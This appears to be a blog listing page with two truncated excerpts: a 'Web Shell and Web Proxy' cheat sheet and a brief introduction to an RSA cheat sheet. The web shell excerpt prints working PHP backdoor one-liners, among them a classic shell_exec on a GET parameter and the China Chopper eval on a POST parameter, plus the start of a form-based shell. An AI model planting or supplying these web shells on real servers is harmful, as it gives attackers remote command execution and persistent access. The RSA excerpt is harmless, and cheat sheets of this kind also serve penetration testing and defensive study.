Web Shell and Web Proxy

WEB SHELLS Classic <?php echo shell_exec($_GET[“cmd”]);?> China Chopper <?php @eval($_POST[‘password’]);?> Web Shell with UI <html><body><form method=”GET” name=”<?php echo basename($_SERVER[‘PHP_SELF’]); ?>”> […]

RSA Cheat Sheet

RSA is an asymmetric cryptosystem that used public and private key pairs. Key Terms Encrypt / Decrypt Popular Tools Known […]